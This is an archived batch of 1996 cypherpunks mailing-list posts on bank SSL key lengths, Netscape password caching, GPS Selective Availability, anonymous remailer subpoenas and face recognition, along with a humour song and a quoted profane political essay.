Wanna see it from me, or try http://www.nytimes.com?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Thu, 11 Apr 1996 21:59:44 +0800
To: tomw@netscape.com (Tom Weinstein)
Subject: Re: Bank information protected by 40-bit encryption....
In-Reply-To: <316C8427.52BF@netscape.com>
Message-ID: <199604110445.VAA06906@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> For Netscape servers, you can configure which ciphers you want to use.
> I'm sure Apache-SSL and most other SSL-capable servers have the same
> sort of thing.  I know that Wells Fargo, at least, requires 128-bit
> encryption.

	(Yeah, Apache-SSL lets you do that too)

	Uh, but Wells Fargo doesn't. Just the other day I used
Netscape 1.x international (i.e. 8cent RC4) to get my bank balances
from Wells Fargo.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Thu, 11 Apr 1996 20:50:01 +0800
To: tomw@netscape.com (Tom Weinstein)
Subject: Re: Bank information protected by 40-bit encryption....
In-Reply-To: <316C919D.1372@netscape.com>
Message-ID: <199604110453.VAA07113@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Can you transfer money or just check balances?  I'm pretty sure that
> they won't let you perform transactions unless you're using
> Netscape 2.0 with 128-bit encryption.

	I was unaware the Wells Fargo let you transfer money with the
web. I only checked my balance.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Thu, 11 Apr 1996 20:22:12 +0800
To: sameer@c2.org
Subject: Re: Bank information protected by 40-bit encryption....
In-Reply-To: <199604110445.VAA06906@atropos.c2.org>
Message-ID: <316C919D.1372@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer@c2.org wrote:
> 
> > For Netscape servers, you can configure which ciphers you want to
> > use. I'm sure Apache-SSL and most other SSL-capable servers have
> > the same sort of thing.  I know that Wells Fargo, at least,
> > requires 128-bit encryption.
> 
>         (Yeah, Apache-SSL lets you do that too)
> 
>         Uh, but Wells Fargo doesn't. Just the other day I used
> Netscape 1.x international (i.e. 8cent RC4) to get my bank balances
> from Wells Fargo.

Can you transfer money or just check balances?  I'm pretty sure that
they won't let you perform transactions unless you're using
Netscape 2.0 with 128-bit encryption.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Fri, 12 Apr 1996 00:49:40 +0800
To: K00l Secrets <cypherpunks@toad.com
Subject: On computer face recognition:
Message-ID: <199604110601.XAA05984@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain



On computer face recognition:


>> Shaving probably will not be a problem, but holding your head at a
>> slightly different angle...  will screw up the system totally,
>> unless the system has radically improved since the last time I read
>> up on it.

At 11:45 AM 4/9/96 -0500, K00l Secrets wrote:
> Well, the systems I have seen are quite good at finding people's eyes.
> Scaling (for distance), and rotation (for the angle of your head)
> therefore don't really confuse the system once it has your eyes.

Finding the eyes can only control for rotations in the plane of 
the image, when you tilt your head to one side.  They cannot 
handle the much more common case of 3D rotations, where you 
look slightly to the right or slightly to the left of camera.
Facial expressions also throw them badly.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Thu, 11 Apr 1996 20:35:02 +0800
To: cypherpunks@toad.com
Subject: [UTTER NOISE] I am the very model of a modern teenage cyberpunk
Message-ID: <v01540b03ad925147a073@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>From the "humor" list. Thought you might enjoy.

------------------------------

Date:    Wed, 10 Apr 1996 07:35:36 -0500
From:    Randall Woodman <randallw@ADSS.ESY.COM>
Subject: Humor: Teenage Cyberpunk

I am the Very Model of a Modern Teenage Cyberpunk
   -author unknown

I am the very model of a modern teenage Cyberpunk
I rent my own apartment and it's full of electronic junk
I own a VAX, a 486, I've even got a PDP
I've finished Myst and Doom but I am stumped by Wing Commander III

I'm very well aquainted too with matters pornographical
I have a list of image sites, both overseas and national
So if you want to see a picture of that Anna Nichole Smith
I'll fire up my terminal and fetch for you a naughty GIF

I'm totally an anarchist, the government I'd like to wreck,
Though if they were to get blown up, who'd give to me my welfare cheque?
In short if you need answers that concern your electronic junk,
I am the very model of a modern teenage Cyberpunk

I know the ancient myths about RTM, Pengo and Mitnick
I 'hack' into computers and I then perform a credit check
I scare all my non-hacker friends with tales of cracker theivery
and even though I'm spouting crap they'll listen and believe in me

I've learned to spot a troll and I've seen flames about the way I spell,
I've traced badly forged cancels and seen napalm poured on AOL
I've laughed at all the newbies and their flailing cries of "You all Suck!"
I've been flamed by Carasso, with an anvil I have then been struck

I've hung around in alt.tasteless and seen war waged on rec.pets.cats
I've spent my time in talk.bizarre and used those stupid Relay Chats
In short, if you need answers that concern your electronic junk,
I am the very model of a modern teenage Cyberpunk

Well postings like "MAKE.MONEY.FAST", I am now somewhat wary at,
I have been "Global Killfiled" by the Joel Furr Commissariat,
When rosebud posts a lengthy rant 'bout Microsoft she swears is true,
I know that she is just another short lived kook without a clue

When I have learnt what progress has been made upon the Internet,
When I know something more than just a smattering of netiquette,
In short when I can have a world-wide soapbox on which I can stand
I've got no time for other things, like beer and trips to Disneyland

My life outside the Internet is very very sad you see
I cannot get my spots to fade, my social life's a tragedy,
But still if you need answers that concern your electronic junk,
I am the very model of a modern teenage Cyberpunk.

(With apologies to G&S)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=} Randall {=-   Editor without a clause.

------------------------------

-------------------------------------------------------------------------
Steven Weller                      |  Weller's three steps to Greatness:
                                   |     1. See what others cannot
                                   |     2. Think what others cannot
stevenw@best.com                   |     3. Express what others cannot






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 11 Apr 1996 23:28:54 +0800
To: rick hoselton <cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
Message-ID: <m0u7Ex6-00090pC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:36 PM 4/10/96 -0700, rick hoselton wrote:
>At 10:04 AM 4/10/96 -0400, Peter Wayner wrote:
>>
>>Hmm. Here's an interesting question.  Let's say that there are 3
>>satellites in view broadcasting signals f1(t), f2(t) and f3(t).
>>...Okay, so why can't I just tape the signals I get from each of
>>the three satellites. 
>
>>Or course, I could be completely missing some neat feature of
>>DGPS. ... Any thoughts?
>
>I have read that GPS uses encryption to place time-dependent, 
>location-dependent inaccuracies into the signals.  Innacuracies 
>small enough so they are not a problem for civilian navigation, 
>(mostly) but large enough to prevent GPS from being a useful method 
>of military targeting for anyone who does not hold the keys.

It's called "S/A" (Selective Availability) which is the NWO term for adding 
errors that "authorized" users can remove. (Not to be confused with A/S, or 
anti-spoofing)   It was originally intended to be turned on in wartime to 
deny the enemy accurate fixes, but during the Gulf War military GPS 
receivers were so scarce that the soldiers had to use commercial products, 
so the S/A actually was turned OFF then!

Since then, pressure has been building to turn off S/A, since its usefulness 
is nearly zero.  Even so, the amplitude of S/A errors are only a little 
larger than natural errors caused by satellite timing errors, atmospheric 
propagation variations, etc.  The result is that DGPS is useful, which is 
(more or less) a fixed antenna and GPS system which knows where it is, and 
subtracts where it "seems" to be by GPS every second, and broadcasts the 
resulting error data on some terrestrial system to receivers locally.  The 
result is errors down to the 1-meter level and even lower.  That system 
compensates for both natural errors and S/A, so the whole purpose of having 
S/A is negated.  Eventually S/A will probably be turned off permanently, but 
even then we'll want to continue to use DGPS systems.


>
>Perhaps Ms. Denning is suggesting that the US feral government could 
>act as a "trusted server" (and she has repeatedly suggested such trust) 
>and tell us whether a GPS that "thinks" it's at some location, right now, 
>is REALLY at some known location.  

Denning's trust for the government is apparently boundless.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Thu, 11 Apr 1996 22:07:33 +0800
To: sameer@c2.org
Subject: Re: Bank information protected by 40-bit encryption....
In-Reply-To: <199604110453.VAA07113@atropos.c2.org>
Message-ID: <316C9890.41C6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer@c2.org wrote:
> 
> > Can you transfer money or just check balances?  I'm pretty sure that
> > they won't let you perform transactions unless you're using
> > Netscape 2.0 with 128-bit encryption.
> 
>         I was unaware the Wells Fargo let you transfer money with the
> web. I only checked my balance.

Sorry, I think I was hallucinating or something.  You're right, they
don't require 128-bit encryption and they only let you query your
balance.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Thu, 11 Apr 1996 23:45:00 +0800
To: cypherpunks@toad.com
Subject: Re: why compression doesn't perfectly even out entropy
Message-ID: <199604110635.XAA08339@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:36 PM 4/9/96 -0400, JonWienke@aol.com wrote:
> Would anyone like to propose a means of measuring entropy that we can all
> agree on?  I haven't seen anything yet that everyone likes.

Nor will you:  To measure entropy is a deep unsolved philosophical
and physical problem.

Only a known distribution has a well defined entropy.  If you do not
know what kinds of order might be present in your data, you cannot
define the entropy.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 12 Apr 1996 01:35:06 +0800
To: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Subject: Re: Bank transactions on Internet
In-Reply-To: <9604091701.AA29911@rpcp.mit.edu>
Message-ID: <316C9EC4.405C@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Joseph M. Reagle Jr. wrote:
> 
> At 04:31 PM 4/8/96 -0700, you wrote:
> >I agree with Jim at SFNB that the encryption made possible by VeriSign
> >server certificates is an integral part of remote banking on the Web.
> >However, I would encourage Security First and other banks looking at the Web
> >to focus increased attention on client certificates AND to migrate away from
> >their dependence on user passwords.
> 
>         I brought this up with SFNB a month or so ago (when I opened my
> account) and the word then was that client side certificates would be
> avaible within a month or so, my time guestimate (based on what they were
> saying) was half-a-year.
> 
> >Admittedly, client certificate
> >functionality has not yet been available but it will probably be standard by
> >mid-1996.
> 
>         Let's hope so, I am not keeping significant funds in that account
> until I have a certificate.

  The release of Netscape Navigator that just started early beta, marketing
named "Atlas", has support for client certificates.  A spec detailing
how to interoperate with it, similar to the one I wrote on SSL 2 server
certificates, should be available before the final release of the product.

> >As Michael Karlin of SFNB noted and subsequently corrected, Netscape caches
> >passwords.
> 
>         I suspected this, and was further exposed because of a common
> problem with using Netscape and the like from student accounts (with a big
> 10M quota), say on MIT's athena, where I like my disk cache to reside in the
> workstations /tmp . I wipe(d) it whenever I log out, but I'm sure others
> sprinkled their passwords in a million "public" cache's before SFNB stuck
> the tag no-cache tag in.

  The statement that "Netscape caches passwords" is not in itself true.
It is true that if the no-cache header is not present, AND the site
is using forms to enter passwords rather than HTTP auth, then the
form post data(including password) will be cached.  I've said here
before that this bug is being fixed in the next beta of the
upcoming release.  The default for SSL pages will be not to cache
at all.  If they used HTTP auth, their passwords would not
have gone into the cache.

> OBJava: do java applets have access to the cache, would it be possible to
> write one of the little nasties that keep an eye on the cache?

  No, Java does not have access to the cache, or any other file.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@mailhost.infi.net>
Date: Sun, 14 Apr 1996 03:17:03 +0800
To: Anonymous <anon-remailer@utopia.hacktic.nl>
Subject: Re: No matter where you go, there they are.
In-Reply-To: <199604091755.TAA13648@utopia.hacktic.nl>
Message-ID: <Pine.SV4.3.91.960410232222.12483B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


President Clinton recently decided to stand-down the dithering (Selective
Availability) of the GPS constellation. Check out the satellite-navigation
and the surveying newsgroups, this is hot stuff amongst these dudes.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 11 Apr 1996 22:09:58 +0800
To: sameer <sameer@c2.org>
Subject: Re: Anonymous Remailer threat: Scientologists may subpoena
Message-ID: <ad91f0580c0210047ab1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:23 AM 4/11/96, sameer wrote:

>        Frankly, I'm getting antsy. Is C2 going to get subpoena'd or
>not? I would be very disappointed if we don't.
>        (Subpeonas envy!)

Good one! Just stay calm and try to maintain your sangfreud.


--Tim


THE X-ON CONGRESS:  INDECENT COMMENT ON AN INDECENT SUBJECT, by Steve
Russell, American Reporter Correspondent....You motherfuckers in Congress
have dropped over the edge of the earth this time... "the sorriest bunch
of cocksuckers ever to sell out the First Amendment" or suggesting that
"the only reason to run for Congress these days is to suck the lobbyists'
dicks and fuck the people who sent you there," ....any more than I care
for the language you shitheads have forced me to use in this
essay...Let's talk about this fucking indecent language bullshit.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: me@muddcs.cs.hmc.edu (Michael Elkins)
Date: Fri, 12 Apr 1996 00:37:24 +0800
To: cypherpunks@toad.com
Subject: Re: Scientologists may subpoena anonymous remailer records
Message-ID: <199604110647.XAA05823@muddcs.cs.hmc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Steve Reid writes:
> When a person recieves a message from someone using an anonymous 
> remailer, the return address will usually work, depending on the 
> remailer. The return address is for an address on the remailer, and 
> sending to that address, the remailer will forward the message back to 
> the person who owns that anonymous address.
> 
> The problem with that, of course, is that the remailer has to keep a 
> record of who owns each anonymous account, so that it can direct the 
> replies to the anonymous person. These records could be siezed.

This is a very good reason to use one of the "alpha" pseudonym servers.
These remailers in turn use other remailers to return the reply to
the owner of the alias (crypted, of course).  In this way, the server
is operating in double-blind mode.

However, the scariest thing about this is that the CoS was able to coerce
the gov't in a foreign nation to get access to anon remailers.  US
remailers have always been suspect for just this reason, and I wait
with bated breath to see whether or not the subpoena is issued.  But if
chaning outside the US won't even work, then the remailers aren't going
to do a whole lot of good.

> BTW, has anyone out there created an anonymous web forwarder? I'm sure 
> there are a lot of people out there who don't like the idea of having 
> their email address in the log files of dozens of web servers... Creating 
> a simple web forwarder wouldn't be hard.

I've heard several people make this statement...  Can anyone confirm that
it is really possible to log the uid (username) of the person making the
http request?  I know they can get your ip address, but I'm skeptical
of getting the username.

me
--
Michael Elkins <me@cs.hmc.edu>			http://www.cs.hmc.edu/~me
PGP key fingerprint = EB B1 68 32 3F B5 54 F9  6C AF 4E 94 5A EB 90 EC




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 12 Apr 1996 01:34:59 +0800
To: cypherpunks@toad.com
Subject: Know Your Net.Enemies Project
In-Reply-To: <Pine.SUN.3.91.960410225933.2006A-100000@kolo.isr.umd.edu>
Message-ID: <ElP83e200YUvQ2hGt5@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Would anyone be interested in collaborating on a "Know Your Net Enemies"
project?

We'd start with a resource like Bob Chatelle's excellent web pages at
<http://world.std.com/~kip/bcfenatl.html> and with permission build on
it and list the deceptions and misrepresentations each Net-Enemy has
engaged in -- what each has done to restrict liberty online. We'd
include original documents and links as appropriate.

Who would be listed? Well, there's the family values groups
[AFA/CC/NLC/EE!/FOF/FRC], the green card spammers, Carnegie Mellon
University, Marty Rimm, the Church of Scientology, the Simon Wiesenthal
Center, the NSA, German state prosecutors, Senator Exon, Dorothy
Denning, and so on.

If each collaborator takes a particular group or person, this could be
done relatively quickly. Then we'd put it online at EFF's web site, with
prominent treatment. All contributors would receive full credit for
their work, of course.

Anyone interested? This would be a great resource.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 11 Apr 1996 21:11:50 +0800
To: Amos Elberg <aelberg@wesleyan.edu>
Subject: Re: PEP Announcement (fwd)
Message-ID: <v02120d03ad922e6be3fe@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:17 PM 4/10/96, you wrote:

> Thanks for the good review, Bob. You're absolutely right about the
> pgp/original message window problem. I wrestled with it through most of
>the
> development process, and it remains the interface element I'd like to
> change most. I ended up choosing the PGP window because I didn't want the
> user to be faced with the choice of saving it unencrypted or losing it
> forever. I did think, however, that it automatically verified and added
> keys on decryption. Are you sure it doesn't?

Got me there. I didn't even check for it. Heh. Now I know better...

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 12 Apr 1996 00:50:57 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <2.2.32.19960410134837.0075cc14@panix.com>
Message-ID: <316CABB9.27F1@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> At 02:38 PM 4/9/96 -0400, Perry E. Metzger wrote:
> 
> >The internet and the culture are coming into conflict in a big way,
> >and I don't believe that both of them can survive.
> >
> >Perry
> 
> Well this is as good a time and place as any to ask the question that
> none of the opposition seems to have asked (perhaps because they don't
> know enough to ask):  How do you force geographically dispersed nodes
> on a distributed network to adopt a set of officially mandated protocols?
> 
> But first a reading assignment:  "How Anarchy Works--Inside the Internet
> Engineering Task Force" from Wired.
> 
> http://www.hotwired.com/wired/3.10/departments/electrosphere/ietf.html
> 
> So, now we know that the IETF has been pretty successful as a means
> of standards setting.  We then have to go on to discuss how The Great
> Enemy might undertake to intervene in this process.

  Given that the IETF has no "official" (whatever that means) sanction,
what would prevent any other organization from coming in and trying to
take over their turf?  I saw an article today (sorry, can't remember
where) that suggested a brewing fight between IETF and W3C over future
HTTP and HTML standards.  If someone stands up and says that the IETF 
is becoming too slow and overcome by bickering (not my opinion, just
a what if), and that their new group is better suited to setting standards,
who decides who is right, and based on what criteria?  It seems that
one aspect of anarchy is that anyone could move in and replace "their
anarchy" with the "new anarchy".

  Just some philosophical pondering late one night...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 12 Apr 1996 01:15:29 +0800
To: "Daniel R. Oelke" <droelke@rdxsunhost.aud.alcatel.com>
Subject: Re: Bank information protected by 40-bit encryption....
In-Reply-To: <9604101921.AA25061@spirit.aud.alcatel.com>
Message-ID: <316CACF9.354D@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Daniel R. Oelke wrote:
> A brief once over shows that it requires Netscape 2.0 or
> better so you will have encryption, but it does not warn you
> when you are using only a 40-bit session key vs. a 128-bit key.
> (Netscape wizards - is there a way that the server can detect
>  this so that a warning message could be put up?)

  There is an environment variable called HTTPS_KEYSIZE that
is passed to cgi's by the HTTP server.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 11 Apr 1996 23:16:08 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Bank information protected by 40-bit encryption....
In-Reply-To: <9604101921.AA25061@spirit.aud.alcatel.com>
Message-ID: <316CADBC.30D1@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Tom Weinstein wrote:
> For Netscape servers, you can configure which ciphers you want to use.
> I'm sure Apache-SSL and most other SSL-capable servers have the same
> sort of thing.  I know that Wells Fargo, at least, requires 128-bit
> encryption.

  Actually I don't think that Wells Fargo requires 128-bit.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Thu, 11 Apr 1996 22:54:17 +0800
To: abostick@netcom.com (Alan Bostick)
Subject: Re: [NOISE] Re: onyma
Message-ID: <v02140b00ad91d0732a58@[165.254.158.226]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:04 4/10/96, Alan Bostick wrote:

>As an experienced professional in this field, I have learned that where
>rules of spelling, grammar, vocabulary come from is *usage*.  Words
>become accepted parts of the language because people start to use them.
>The acceptance of words is recognized by their adoption in to lexicons
>and dictionaries, but this is description, not prescription.
>
>If you want to be linguistically correct and ensure that 'onyma'
>prevails over 'nym,' you've got a lot of catching up to do.  'Nym' is
>is clearly established by usage on the Cypherpunks list, and I expect
>it's only a matter of time before it starts showing up in print media,
>if it hasn't already, and get listings in the Jargon File, then
>dictionaries, etc.
>
>You can't fight usage; it is usage that makes the language as she is
>spoke what it is.

I agree with you and I'll go further and state that the use of "nym" is due
to it being the suffix of all the terms that are lumped into it _AND_ is
spoken in them as a separate (and last) syllable. Use of ONYM would not be
as obvious since the "o" is _part_ of the prior syllable _not_ the prior
syllable (also none of the words use ONYMA so that is also not a good term
to the general public <g>). This is a case of using the last syllable of a
number of terms/words as a generic term for all of them (or the use of that
syllable as a generic suffix to other words to create a new term with the
connotation of that suffix's meaning [as in using -ism at the end of other
words]).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 12 Apr 1996 07:12:39 +0800
To: cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
Message-ID: <199604111437.HAA05376@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I think the various comments are correct that Denning's scheme won't work
across the Internet as it currently exists.  Any network with latencies in
the multiple milliseconds and up will allow the fraud where the remote node
lies about its latency in order to allow it to move some of the received
data "forward in time", which is necessary but would not be possible if
latency were known and fixed.

Note however that Denning did not mention the Internet in her spiel.

I believe her method would be workable across lower latency networks, if such
exist or eventually exist.  Perhaps direct connections or leased lines would
provide low enough latency; I don't know.  In any case networks are likely
to become faster in the future and her method might eventually work.
Actually the issue is not just latency but whether the latency can be
lied about, and for some kinds of networks that would be harder.

The method of using authenticated devices which provide timestamped
data from satellites not visible to the authenticating site does not
need to provide that data in real time.  Even if it is delayed so it
comes in later than the data from the remote site, the verifying site
can still use it to calculate what the remote site should have been
seeing, and so get the benefit of using timings from all the satellites
visible to the remote site (again, assuming the remote site itself has
a low latency connection to the authenticating site).

They do mention that in urban or other obstructed locations a partial
view of the sky may be adequate.  But of course if all the satellites
visible to the remote site are in the south, it can move its apparently
location north by using older data.  So for the system to work there
must be satellites visible in all parts of the sky (no line you can
draw through your location which puts all satellites on one side of
that line).

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 12 Apr 1996 04:44:53 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous Remailer threat: Scientologists may subpoena	  anonymous remailer records?
Message-ID: <199604111440.HAA05561@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: tcmay@got.net (Timothy C. May)
> At 7:37 PM 4/10/96, Jim Byrd wrote:
> >to find the identity of -AB-.  This turned out to be an alumni account at
> >Cal Tech.  The poster has never been heard from again.
> 
> This was without a doubt just a user of one of Hal Finney's remailers he
> runs out of an account at Caltech. (There's a tiny chance it was someone
> else, but it fits the description of Hal's "alumni" remailer exactly, and
> is almost certainly just that.)

Actually, this is not true.  The poster, from rumors I have heard, was
someone else with a Caltech alumni account (I don't know who).  I have
never been contacted by any representatives of Scientology with respect
to this case.  So it is apparently just a coincidence that this case
involved the same system as my remailer.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 12 Apr 1996 05:33:56 +0800
To: "Christopher J. Shaulis" <cjs@netcom.com>
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <199604110005.UAA00491@localhost.cjs.net>
Message-ID: <Pine.SOL.3.91.960411081147.6234C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 10 Apr 1996, Christopher J. Shaulis wrote:
> 
> In the future, you will have to sign all packets (with a key
> conveniently available from verisign and noone else).

No - the company that will bring it to you: AT&T :)

Seriously - putting this sort of stuff at the IP layer is not doable; 
confidentiality and encryption, at least on a host-to-host basis is 
sensible (we know a protocol about that, don't we children)

Application AND user level authentication doesn't fit so well below the 
application level. 

Simon
p.s.

Am I the only one to find it really wierd that the Unabomber had a 
pen-pal? Guess they don't last long..

 ---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay.Olbon@dynetics.com (Clay Olbon II)
Date: Fri, 12 Apr 1996 02:43:30 +0800
To: cypherpunks@toad.com
Subject: Re: (Fwd) British Study Claims That Photo Credit Cards Don't  	  Work
Message-ID: <v01540b03ad92aa94874e@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:10 AM 4/9/96, jim bell wrote:
>At 07:57 AM 4/9/96 -0500, Mike McNally wrote:
>>jamesd@echeque.com wrote:
>
>>There are supposedly some new techniques that look at the infrared
>>signature of your face (like, I guess, distribution & position of
>>hot & cold spots), and that's less likely to be fooled by facial
>>hair and other superficial disguises.  It's probably a fairly simple
>>technology, and could be applied to the credit card ID problem.
>
>I think this is based on looking at your face with near-infrared, not the
>medium and far (thermal) infrared.  Near infrared is supposed to penetrate
>flesh far better, so your blood vessels are visible and form a pattern
>which can be recognized.
>
>Jim Bell
>jimbell@pacifier.com

Jim,

Where did you get your info?  Near IR is around 1-1.5 microns, at these
wavelengths, the body radiates very little energy.  I think most of the
systems you are discussing use mid (3-5) or long-wave (8-12) IR, where
objects that are room to body temp radiate most of their energy.

        Clay


---------------------------------------------------------------------------
Clay Olbon II            | Clay.Olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: finger olbon@mgr.dynetics.com
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
                TANSTAAFL - Robert Heinlein, in various works
---------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 13 Apr 1996 05:28:46 +0800
To: cypherpunks@toad.com
Subject: Re: (Fwd) British Study Claims That Photo Credit Cards Don't    Work
Message-ID: <m0u7Ov2-0008zwC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:42 AM 4/11/96 -0400, Clay Olbon II wrote:
>At 11:10 AM 4/9/96, jim bell wrote:
>>At 07:57 AM 4/9/96 -0500, Mike McNally wrote:

>>>There are supposedly some new techniques that look at the infrared
>>>signature of your face (like, I guess, distribution & position of
>>>hot & cold spots), and that's less likely to be fooled by facial
>>>hair and other superficial disguises.  It's probably a fairly simple
>>>technology, and could be applied to the credit card ID problem.
>>
>>I think this is based on looking at your face with near-infrared, not the
>>medium and far (thermal) infrared.  Near infrared is supposed to penetrate
>>flesh far better, so your blood vessels are visible and form a pattern
>>which can be recognized.
>>
>>Jim Bell
>>jimbell@pacifier.com
>
>Jim,
>
>Where did you get your info?  Near IR is around 1-1.5 microns, at these
>wavelengths, the body radiates very little energy.  I think most of the
>systems you are discussing use mid (3-5) or long-wave (8-12) IR, where
>objects that are room to body temp radiate most of their energy.

I get most of my information in this area from Photonics Spectra magazine, 
and Laser Focus World magazine.

No, Clay, I did not say that the flesh RADIATED near IR. (it does, but only 
a very tiny amount.)  The identification system I describe would probably 
use 940 nm IRLEDs to illuminate the face, and a silicon CCD detector to pick 
up the images.  Or it would use ambient near-IR, perhaps from the sun or a 
tungsten filament or fluorescent lighting, along with an IR filter to ensure 
that the CCD camera picked up only the IR bands of interest.  It would be 
